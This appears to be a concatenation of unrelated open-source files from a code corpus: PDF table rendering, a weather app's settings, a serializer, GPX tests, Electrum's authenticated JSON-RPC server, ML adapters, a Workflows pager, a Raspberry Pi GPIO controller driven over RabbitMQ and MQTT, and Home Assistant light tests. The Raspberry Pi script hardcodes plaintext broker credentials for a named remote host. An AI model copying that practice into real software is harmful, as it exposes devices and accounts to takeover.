c.frag.borderBottomColor,
"squared"))
self.add_style(('LEFTPADDING', begin, end, c.frag.paddingLeft or self.padding))
self.add_style(('RIGHTPADDING', begin, end, c.frag.paddingRight or self.padding))
self.add_style(('TOPPADDING', begin, end, c.frag.paddingTop or self.padding))
self.add_style(('BOTTOMPADDING', begin, end, c.frag.paddingBottom or self.padding))
class pisaTagTABLE(pisaTag):
def start(self, c):
c.addPara()
attrs = self.attr
# Swap table data
c.tableData, self.tableData = TableData(), c.tableData
tdata = c.tableData
# border
#tdata.border = attrs.border
#tdata.bordercolor = attrs.bordercolor
begin = (0, 0)
end = (-1, - 1)
if attrs.border and attrs.bordercolor:
frag = c.frag
frag.borderLeftWidth = attrs.border
frag.borderLeftColor = attrs.bordercolor
frag.borderLeftStyle = "solid"
frag.borderRightWidth = attrs.border
frag.borderRightColor = attrs.bordercolor
frag.borderRightStyle = "solid"
frag.borderTopWidth = attrs.border
frag.borderTopColor = attrs.bordercolor
frag.borderTopStyle = "solid"
frag.borderBottomWidth = attrs.border
frag.borderBottomColor = attrs.bordercolor
frag.borderBottomStyle = "solid"
# tdata.add_style(("GRID", begin, end, attrs.border, attrs.bordercolor))
tdata.padding = attrs.cellpadding
#if 0: #attrs.cellpadding:
# tdata.add_style(('LEFTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('RIGHTPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('TOPPADDING', begin, end, attrs.cellpadding))
# tdata.add_style(('BOTTOMPADDING', begin, end, attrs.cellpadding))
# alignment
#~ tdata.add_style(('VALIGN', (0,0), (-1,-1), attrs.valign.upper()))
# Set Border and padding styles
tdata.add_cell_styles(c, (0, 0), (-1, - 1), "table")
# bgcolor
#if attrs.bgcolor is not None:
# tdata.add_style(('BACKGROUND', (0, 0), (-1, -1), attrs.bgcolor))
tdata.align = attrs.align.upper()
tdata.col = 0
tdata.row = 0
tdata.colw = []
tdata.rowh = []
tdata.repeat = attrs.repeat
tdata.width = _width(attrs.width)
# self.tabdata.append(tdata)
def end(self, c):
tdata = c.tableData
data = tdata.get_data()
# Add missing columns so that each row has the same count of columns
# This prevents errors in Reportlab table
try:
maxcols = max([len(row) for row in data] or [0])
except ValueError:
log.warn(c.warning("<table> rows seem to be inconsistent"))
maxcols = [0]
for i, row in enumerate(data):
data[i] += [''] * (maxcols - len(row))
try:
if tdata.data:
# log.debug("Table sryles %r", tdata.styles)
t = PmlTable(
data,
colWidths=tdata.colw,
rowHeights=tdata.rowh,
# totalWidth = tdata.width,
splitByRow=1,
# repeatCols = 1,
repeatRows=tdata.repeat,
hAlign=tdata.align,
vAlign='TOP',
style=TableStyle(tdata.styles))
t.totalWidth = _width(tdata.width)
t.spaceBefore = c.frag.spaceBefore
t.spaceAfter = c.frag.spaceAfter
# XXX Maybe we need to copy some more properties?
t.keepWithNext = c.frag.keepWithNext
# t.hAlign = tdata.align
c.addStory(t)
else:
log.warn(c.warning("<table> is empty"))
except:
log.warn(c.warning("<table>"), exc_info=1)
# Cleanup and re-swap table data
c.clearFrag()
c.tableData, self.tableData = self.tableData, None
class pisaTagTR(pisaTag):
def start(self, c):
tdata = c.tableData
row = tdata.row
begin = (0, row)
end = (-1, row)
tdata.add_cell_styles(c, begin, end, "tr")
c.frag.vAlign = self.attr.valign or c.frag.vAlign
tdata.col = 0
tdata.data.append([])
def end(self, c):
c.tableData.row += 1
class pisaTagTD(pisaTag):
def start(self, c):
if self.attr.align is not None:
#print self.attr.align, getAlign(self.attr.align)
c.frag.alignment = getAlign(self.attr.align)
c.clearFrag()
self.story = c.swapStory()
# print "#", len(c.story)
attrs = self.attr
tdata = c.tableData
cspan = attrs.colspan
rspan = attrs.rowspan
row = tdata.row
col = tdata.col
while 1:
for x, y in tdata.span:
if x == col and y == row:
col += 1
tdata.col += 1
break
#cs = 0
#rs = 0
begin = (col, row)
end = (col, row)
if cspan:
end = (end[0] + cspan - 1, end[1])
if rspan:
end = (end[0], end[1] + rspan - 1)
if begin != end:
#~ print begin, end
tdata.add_style(('SPAN', begin, end))
for x in range(begin[0], end[0] + 1):
for y in range(begin[1], end[1] + 1):
if x != begin[0] or y != begin[1]:
tdata.add_empty(x, y)
# Set Border and padding styles
tdata.add_cell_styles(c, begin, end, "td")
# Calculate widths
# Add empty placeholders for new columns
if (col + 1) > len(tdata.colw):
tdata.colw = tdata.colw + ((col + 1 - len(tdata.colw)) * [_width()])
# Get value of with, if no spanning
if not cspan:
# print c.frag.width
width = c.frag.width or self.attr.width #self._getStyle(None, attrs, "width", "width", mode)
# If is value, the set it in the right place in the arry
# print width, _width(width)
if width is not None:
tdata.colw[col] = _width(width)
# Calculate heights
if row + 1 > len(tdata.rowh):
tdata.rowh = tdata.rowh + ((row + 1 - len(tdata.rowh)) * [_width()])
if not rspan:
height = None #self._getStyle(None, attrs, "height", "height", mode)
if height is not None:
tdata.rowh[row] = _width(height)
tdata.add_style(('FONTSIZE', begin, end, 1.0))
tdata.add_style(('LEADING', begin, end, 1.0))
# Vertical align
valign = self.attr.valign or c.frag.vAlign
if valign is not None:
tdata.add_style(('VALIGN', begin, end, valign.upper()))
# Reset border, otherwise the paragraph block will have borders too
frag = c.frag
frag.borderLeftWidth = 0
frag.borderLeftColor = None
frag.borderLeftStyle = None
frag.borderRightWidth = 0
frag.borderRightColor = None
frag.borderRightStyle = None
frag.borderTopWidth = 0
frag.borderTopColor = None
frag.borderTopStyle = None
frag.borderBottomWidth = 0
frag.borderBottomColor = None
frag.borderBottomStyle = None
def end(self, c):
tdata = c.tableData
c.addPara()
cell = c.story
# Handle empty cells, they otherwise collapse
#if not cell:
# cell = ' '
# Keep in frame if needed since Reportlab does no split inside of cells
if (not c.frag.insideStaticFrame) and (c.frag.keepInFrameMode is not None):
# tdata.keepinframe["content"] = cell
cell = PmlKeepInFrame(
maxWidth=0,
maxHeight=0,
mode=c.frag.keepInFrameMode,
content=cell)
c.swapStory(self.story)
tdata.add_cell(cell)
class pisaTagTH(pisaTagTD):
pass
'''
end_th = end_td
def start_keeptogether(self, attrs):
self.story.append([])
self.next_para()
def end_keeptogether(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
s = self.story.pop()
self.add_story(KeepTogether(s))
def start_keepinframe(self, attrs):
self.story.append([])
self.keepinframe = {
"maxWidth": attrs["maxwidth"],
"maxHeight": attrs["maxheight"],
"mode": attrs["mode"],
"name": attrs["name"],
"mergeSpace": attrs["mergespace"]
}
# print self.keepinframe
self.next_para()
def end_keepinframe(self):
if not self.story[-1]:
self.add_noop()
self.next_para()
self.keepinframe["content"] = self.story.pop()
self.add_story(KeepInFrame(**self.keepinframe))
''' | mit | 3,694,893,880,446,124,500 | 32.439206 | 122 | 0.517475 | false |
timevortexproject/timevortex | weather/utils/globals.py | 1 | 1404 | #!/usr/bin/python3
# -*- coding: utf8 -*-
# -*- Mode: Python; py-indent-offset: 4 -*-
"""Globals for weather app"""
from datetime import datetime, timedelta
from django.conf import settings
KEY_METEAR_NO_SITE_ID = "metear_no_site_id"
KEY_METEAR_BAD_URL = "metear_bad_url"
KEY_METEAR_PROBLEM_WS = "metear_problem_ws"
KEY_METEAR_BAD_CONTENT = "metear_bad_content"
KEY_METEAR_NO_START_DATE = "metear_no_start_date"
PROCESS_STOPPED = "Process stopped. Wait a minute before retrying."
ERROR_METEAR = {
KEY_METEAR_NO_SITE_ID: "No METEAR Site in database. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_URL: "Bad URL to target METEAR service. %s" % PROCESS_STOPPED,
KEY_METEAR_PROBLEM_WS: "METEAR Web service does not respond. %s" % PROCESS_STOPPED,
KEY_METEAR_BAD_CONTENT: "Bad content from METEAR Web service. %s" % PROCESS_STOPPED,
KEY_METEAR_NO_START_DATE: "No start date found in DB. %s" % PROCESS_STOPPED,
}
SETTINGS_METEAR_URL = "METEAR_URL"
SETTINGS_DEFAULT_METEAR_URL = "http://www.wunderground.com/history/airport/%s/%s/DailyHistory.html?format=1"
SETTINGS_STUBS_METEAR_URL = "%s%s" % (settings.SITE_URL, "/stubs/history/airport/%s/%s/DailyHistory.html?format=1")
SETTINGS_STUBS_NEW_METEAR_URL = "%s%s" % (
settings.SITE_URL, "/stubs/history/airport/%s/%s/NewDailyHistory.html?format=1")
SETTINGS_STUBS_METEAR_START_DATE = (datetime.today() - timedelta(days=3)).strftime("%Y/%m/%d")
| mit | -9,200,364,049,418,442,000 | 49.142857 | 115 | 0.712251 | false |
uclouvain/osis | reference/api/serializers/study_domain.py | 1 | 1550 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2021 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from rest_framework import serializers
from reference.models.domain import Domain
class StudyDomainSerializer(serializers.ModelSerializer):
class Meta:
model = Domain
fields = (
'uuid',
'code',
'name',
)
| agpl-3.0 | 3,864,788,192,204,684,000 | 39.763158 | 87 | 0.634603 | false |
fortyninemaps/karta | tests/gpx_tests.py | 1 | 2736 | import unittest
import os
from test_helper import TESTDATA
import numpy as np
import karta
import karta.vector as vector
from karta.vector.geometry import Point, Multipoint, Line, Polygon
class GPXTests(unittest.TestCase):
def setUp(self):
self.points = [vector.gpx.Point((np.random.random(), np.random.random()),
{}, {}) for i in range(20)]
self.segments = [vector.gpx.Trkseg(self.points, {}, {})]
self.tracks = [vector.gpx.Track(self.segments, {}, {})]
self.routes = [vector.gpx.Route(self.points, {}, {})]
self.Point = vector.gpx.Point
self.Trkseg = vector.gpx.Trkseg
self.Track = vector.gpx.Track
self.Route = vector.gpx.Route
return
def test_track_init(self):
""" Test initiation of a GPX file containing a single track. """
g = vector.gpx.GPX()
for i, pt in enumerate(self.points):
g.waypts.append(pt)
g.tracks = self.tracks
g.routes = self.routes
return
def test_add_waypoint(self):
waypoint = Point((-80.0, 82.0),
properties = {"name": "ellesmere", "ele": 100})
g = vector.gpx.GPX()
g.add_waypoint(waypoint)
expected = self.Point((-80.0, 82.0), {"name": "ellesmere",
"ele": "100"}, {})
self.assertEqual(g.waypts[0], expected)
return
def test_add_track(self):
track = Multipoint([(np.random.random(), np.random.random())
for i in range(10)], properties={"name":"segment0"})
g = vector.gpx.GPX()
g.add_track(track)
expected = self.Track([self.Trkseg(
[self.Point(tuple(xy), {}, {}) for xy in track.vertices()],
{"name":"segment0"}, {})], {}, {})
self.assertEqual(g.tracks[0], expected)
return
def test_add_route(self):
route = Multipoint([(np.random.random(), np.random.random())
for i in range(10)], properties={"name":"route0"})
g = vector.gpx.GPX()
g.add_route(route)
expected = self.Route([self.Point(tuple(xy), {}, {}) for xy in route.vertices()],
{"name":"route0"}, {})
self.assertEqual(g.routes[0], expected)
return
class ReadGPXTests(unittest.TestCase):
def test_mtn_bike_trail(self):
tracks = vector.read_gpx_tracks(os.path.join(TESTDATA, "gpx_input", "fishermans-trail.gpx"))
track1 = tracks[0]
seg1 = track1[0]
self.assertEqual(seg1.bbox(), (-123.00702, 49.32947, -122.991408, 49.392751))
if __name__ == "__main__":
unittest.main()
| mit | -4,095,670,081,740,067,000 | 35.972973 | 100 | 0.546784 | false |
cryptapus/electrum-myr | lib/jsonrpc.py | 1 | 3726 | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2018 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer, SimpleJSONRPCRequestHandler
from base64 import b64decode
import time
from . import util
class RPCAuthCredentialsInvalid(Exception):
def __str__(self):
return 'Authentication failed (bad credentials)'
class RPCAuthCredentialsMissing(Exception):
def __str__(self):
return 'Authentication failed (missing credentials)'
class RPCAuthUnsupportedType(Exception):
def __str__(self):
return 'Authentication failed (only basic auth is supported)'
# based on http://acooke.org/cute/BasicHTTPA0.html by andrew cooke
class VerifyingJSONRPCServer(SimpleJSONRPCServer):
def __init__(self, rpc_user, rpc_password, *args, **kargs):
self.rpc_user = rpc_user
self.rpc_password = rpc_password
class VerifyingRequestHandler(SimpleJSONRPCRequestHandler):
def parse_request(myself):
# first, call the original implementation which returns
# True if all OK so far
if SimpleJSONRPCRequestHandler.parse_request(myself):
try:
self.authenticate(myself.headers)
return True
except (RPCAuthCredentialsInvalid, RPCAuthCredentialsMissing,
RPCAuthUnsupportedType) as e:
myself.send_error(401, str(e))
except BaseException as e:
import traceback, sys
traceback.print_exc(file=sys.stderr)
myself.send_error(500, str(e))
return False
SimpleJSONRPCServer.__init__(
self, requestHandler=VerifyingRequestHandler, *args, **kargs)
def authenticate(self, headers):
if self.rpc_password == '':
# RPC authentication is disabled
return
auth_string = headers.get('Authorization', None)
if auth_string is None:
raise RPCAuthCredentialsMissing()
(basic, _, encoded) = auth_string.partition(' ')
if basic != 'Basic':
raise RPCAuthUnsupportedType()
encoded = util.to_bytes(encoded, 'utf8')
credentials = util.to_string(b64decode(encoded), 'utf8')
(username, _, password) = credentials.partition(':')
if not (util.constant_time_compare(username, self.rpc_user)
and util.constant_time_compare(password, self.rpc_password)):
time.sleep(0.050)
raise RPCAuthCredentialsInvalid()
| mit | 1,195,370,511,997,288,000 | 38.221053 | 91 | 0.665056 | false |
google-research/google-research | ipagnn/adapters/gat_adapters.py | 1 | 2892 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adapters for GAT models."""
import jax
import jax.numpy as jnp
from ipagnn.adapters import common_adapters
class GATAdapter(common_adapters.SequenceAdapter):
"""Adapter for GAT model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
class GGNNAdapter(common_adapters.SequenceAdapter):
"""Adapter for GGNN model."""
def as_example(self, dataset_item):
inputs = jax.tree_map(lambda x: x.numpy(), dataset_item)
example = {
'start_index': inputs['cfg']['start_index'],
'exit_index': inputs['cfg']['exit_index'],
'data': inputs['cfg']['data'],
'edge_types': inputs['cfg']['edge_types'],
'source_indices': inputs['cfg']['adjacency_list/source_indices'],
'dest_indices': inputs['cfg']['adjacency_list/dest_indices'],
'steps': inputs['cfg']['steps'],
'target_output': inputs['target_output'],
'target_output_length': inputs['target_output_length'],
'human_readable_target_output': inputs['human_readable_target_output'],
'human_readable_code': inputs['human_readable_code'],
}
if 'error_type' in inputs:
example['error_type'] = inputs['error_type']
return example
def get_train_inputs(self, example):
return {key: value for key, value in example.items()
if value.dtype != jnp.dtype('O')}
| apache-2.0 | 6,610,926,958,701,834,000 | 37.56 | 79 | 0.651107 | false |
googleapis/python-workflows | google/cloud/workflows_v1beta/services/workflows/pagers.py | 1 | 5782 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import (
Any,
AsyncIterable,
Awaitable,
Callable,
Iterable,
Sequence,
Tuple,
Optional,
)
from google.cloud.workflows_v1beta.types import workflows
class ListWorkflowsPager:
"""A pager for iterating through ``list_workflows`` requests.
This class thinly wraps an initial
:class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse` object, and
provides an ``__iter__`` method to iterate through its
``workflows`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListWorkflows`` requests and continue to iterate
through the ``workflows`` field on the
corresponding responses.
All the usual :class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., workflows.ListWorkflowsResponse],
request: workflows.ListWorkflowsRequest,
response: workflows.ListWorkflowsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.workflows_v1beta.types.ListWorkflowsRequest):
The initial request object.
response (google.cloud.workflows_v1beta.types.ListWorkflowsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = workflows.ListWorkflowsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[workflows.ListWorkflowsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[workflows.Workflow]:
for page in self.pages:
yield from page.workflows
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
class ListWorkflowsAsyncPager:
"""A pager for iterating through ``list_workflows`` requests.
This class thinly wraps an initial
:class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``workflows`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListWorkflows`` requests and continue to iterate
through the ``workflows`` field on the
corresponding responses.
All the usual :class:`google.cloud.workflows_v1beta.types.ListWorkflowsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(
self,
method: Callable[..., Awaitable[workflows.ListWorkflowsResponse]],
request: workflows.ListWorkflowsRequest,
response: workflows.ListWorkflowsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()
):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.workflows_v1beta.types.ListWorkflowsRequest):
The initial request object.
response (google.cloud.workflows_v1beta.types.ListWorkflowsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = workflows.ListWorkflowsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[workflows.ListWorkflowsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[workflows.Workflow]:
async def async_generator():
async for page in self.pages:
for response in page.workflows:
yield response
return async_generator()
def __repr__(self) -> str:
return "{0}<{1!r}>".format(self.__class__.__name__, self._response)
| apache-2.0 | 7,345,909,831,732,091,000 | 36.303226 | 87 | 0.654445 | false |
sakthivigneshr/homeauto | src/control/rpi/rpi_gpio_slave.py | 1 | 1752 | import pika
import RPi.GPIO as GPIO
import paho.mqtt.client as mqtt
from threading import Thread
USER = "test"
PASS = "test123"
VHOST = "/cloudlynk"
HOST = "mohawk.link"
KEY = "solfeta"
XCHANGE = "home"
OUTPUT_PIN = 7
def callback(ch, method, properties, body):
level = int(body)
print("received msg: " + repr(level))
GPIO.output(OUTPUT_PIN, level)
def on_message(mqttc, app_data, msg):
level = int(msg.payload)
print "Received message " + repr(level)
GPIO.output(OUTPUT_PIN, level)
def on_connect(mqttc, app_data, flags, rc):
print "Connect successful"
mqttc.subscribe("control/lights/00")
class rabbitConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting RabbitMQ"
cred = pika.PlainCredentials(USER, PASS)
conn = pika.BlockingConnection(pika.ConnectionParameters(
host=HOST, virtual_host=VHOST, credentials=cred))
chan = conn.channel()
chan.exchange_declare(exchange=XCHANGE, type='topic')
rslt = chan.queue_declare(exclusive=True)
q = rslt.method.queue
chan.queue_bind(exchange=XCHANGE, queue=q, routing_key=KEY)
chan.basic_consume(callback, queue=q, no_ack=True)
chan.start_consuming()
class mqttConnect(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
print "Starting MQTT"
mqttc = mqtt.Client()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.connect("mohawk.link", 1883, 60)
mqttc.loop_forever()
class main():
# Setup the pins
GPIO.setmode(GPIO.BOARD)
GPIO.setup(OUTPUT_PIN, GPIO.OUT)
myThreadObj1 = rabbitConnect()
myThreadObj1.start()
myThreadObj2 = mqttConnect()
myThreadObj2.start()
myThreadObj1.join()
myThreadObj2.join()
if __name__ == "__main__":
main()
| mit | 8,074,197,039,635,007,000 | 22.052632 | 61 | 0.694635 | false |
persandstrom/home-assistant | tests/components/light/test_init.py | 1 | 17099 | """The tests for the Light component."""
# pylint: disable=protected-access
import unittest
import unittest.mock as mock
import os
from io import StringIO
from homeassistant import core, loader
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.const import (
ATTR_ENTITY_ID, STATE_ON, STATE_OFF, CONF_PLATFORM,
SERVICE_TURN_ON, SERVICE_TURN_OFF, SERVICE_TOGGLE, ATTR_SUPPORTED_FEATURES)
from homeassistant.components import light
from homeassistant.helpers.intent import IntentHandleError
from tests.common import (
async_mock_service, mock_service, get_test_home_assistant, mock_storage)
class TestLight(unittest.TestCase):
"""Test the light module."""
# pylint: disable=invalid-name
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
# pylint: disable=invalid-name
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
if os.path.isfile(user_light_file):
os.remove(user_light_file)
def test_methods(self):
"""Test if methods call the services as expected."""
# Test is_on
self.hass.states.set('light.test', STATE_ON)
self.assertTrue(light.is_on(self.hass, 'light.test'))
self.hass.states.set('light.test', STATE_OFF)
self.assertFalse(light.is_on(self.hass, 'light.test'))
self.hass.states.set(light.ENTITY_ID_ALL_LIGHTS, STATE_ON)
self.assertTrue(light.is_on(self.hass))
self.hass.states.set(light.ENTITY_ID_ALL_LIGHTS, STATE_OFF)
self.assertFalse(light.is_on(self.hass))
# Test turn_on
turn_on_calls = mock_service(
self.hass, light.DOMAIN, SERVICE_TURN_ON)
light.turn_on(
self.hass,
entity_id='entity_id_val',
transition='transition_val',
brightness='brightness_val',
rgb_color='rgb_color_val',
xy_color='xy_color_val',
profile='profile_val',
color_name='color_name_val',
white_value='white_val')
self.hass.block_till_done()
self.assertEqual(1, len(turn_on_calls))
call = turn_on_calls[-1]
self.assertEqual(light.DOMAIN, call.domain)
self.assertEqual(SERVICE_TURN_ON, call.service)
self.assertEqual('entity_id_val', call.data.get(ATTR_ENTITY_ID))
self.assertEqual(
'transition_val', call.data.get(light.ATTR_TRANSITION))
self.assertEqual(
'brightness_val', call.data.get(light.ATTR_BRIGHTNESS))
self.assertEqual('rgb_color_val', call.data.get(light.ATTR_RGB_COLOR))
self.assertEqual('xy_color_val', call.data.get(light.ATTR_XY_COLOR))
self.assertEqual('profile_val', call.data.get(light.ATTR_PROFILE))
self.assertEqual(
'color_name_val', call.data.get(light.ATTR_COLOR_NAME))
self.assertEqual('white_val', call.data.get(light.ATTR_WHITE_VALUE))
# Test turn_off
turn_off_calls = mock_service(
self.hass, light.DOMAIN, SERVICE_TURN_OFF)
light.turn_off(
self.hass, entity_id='entity_id_val', transition='transition_val')
self.hass.block_till_done()
self.assertEqual(1, len(turn_off_calls))
call = turn_off_calls[-1]
self.assertEqual(light.DOMAIN, call.domain)
self.assertEqual(SERVICE_TURN_OFF, call.service)
self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])
self.assertEqual('transition_val', call.data[light.ATTR_TRANSITION])
# Test toggle
toggle_calls = mock_service(
self.hass, light.DOMAIN, SERVICE_TOGGLE)
light.toggle(
self.hass, entity_id='entity_id_val', transition='transition_val')
self.hass.block_till_done()
self.assertEqual(1, len(toggle_calls))
call = toggle_calls[-1]
self.assertEqual(light.DOMAIN, call.domain)
self.assertEqual(SERVICE_TOGGLE, call.service)
self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])
self.assertEqual('transition_val', call.data[light.ATTR_TRANSITION])
def test_services(self):
"""Test the provided services."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
self.assertTrue(
setup_component(self.hass, light.DOMAIN,
{light.DOMAIN: {CONF_PLATFORM: 'test'}}))
dev1, dev2, dev3 = platform.DEVICES
# Test init
self.assertTrue(light.is_on(self.hass, dev1.entity_id))
self.assertFalse(light.is_on(self.hass, dev2.entity_id))
self.assertFalse(light.is_on(self.hass, dev3.entity_id))
# Test basic turn_on, turn_off, toggle services
light.turn_off(self.hass, entity_id=dev1.entity_id)
light.turn_on(self.hass, entity_id=dev2.entity_id)
self.hass.block_till_done()
self.assertFalse(light.is_on(self.hass, dev1.entity_id))
self.assertTrue(light.is_on(self.hass, dev2.entity_id))
# turn on all lights
light.turn_on(self.hass)
self.hass.block_till_done()
self.assertTrue(light.is_on(self.hass, dev1.entity_id))
self.assertTrue(light.is_on(self.hass, dev2.entity_id))
self.assertTrue(light.is_on(self.hass, dev3.entity_id))
# turn off all lights
light.turn_off(self.hass)
self.hass.block_till_done()
self.assertFalse(light.is_on(self.hass, dev1.entity_id))
self.assertFalse(light.is_on(self.hass, dev2.entity_id))
self.assertFalse(light.is_on(self.hass, dev3.entity_id))
# toggle all lights
light.toggle(self.hass)
self.hass.block_till_done()
self.assertTrue(light.is_on(self.hass, dev1.entity_id))
self.assertTrue(light.is_on(self.hass, dev2.entity_id))
self.assertTrue(light.is_on(self.hass, dev3.entity_id))
# toggle all lights
light.toggle(self.hass)
self.hass.block_till_done()
self.assertFalse(light.is_on(self.hass, dev1.entity_id))
self.assertFalse(light.is_on(self.hass, dev2.entity_id))
self.assertFalse(light.is_on(self.hass, dev3.entity_id))
# Ensure all attributes process correctly
light.turn_on(self.hass, dev1.entity_id,
transition=10, brightness=20, color_name='blue')
light.turn_on(
self.hass, dev2.entity_id, rgb_color=(255, 255, 255),
white_value=255)
light.turn_on(self.hass, dev3.entity_id, xy_color=(.4, .6))
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({
light.ATTR_TRANSITION: 10,
light.ATTR_BRIGHTNESS: 20,
light.ATTR_HS_COLOR: (240, 100),
}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (0, 0),
light.ATTR_WHITE_VALUE: 255,
}, data)
_, data = dev3.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (71.059, 100),
}, data)
# One of the light profiles
prof_name, prof_h, prof_s, prof_bri = 'relax', 35.932, 69.412, 144
# Test light profiles
light.turn_on(self.hass, dev1.entity_id, profile=prof_name)
# Specify a profile and a brightness attribute to overwrite it
light.turn_on(
self.hass, dev2.entity_id,
profile=prof_name, brightness=100)
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({
light.ATTR_BRIGHTNESS: prof_bri,
light.ATTR_HS_COLOR: (prof_h, prof_s),
}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({
light.ATTR_BRIGHTNESS: 100,
light.ATTR_HS_COLOR: (prof_h, prof_s),
}, data)
# Test bad data
light.turn_on(self.hass)
light.turn_on(self.hass, dev1.entity_id, profile="nonexisting")
light.turn_on(self.hass, dev2.entity_id, xy_color=["bla-di-bla", 5])
light.turn_on(self.hass, dev3.entity_id, rgb_color=[255, None, 2])
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
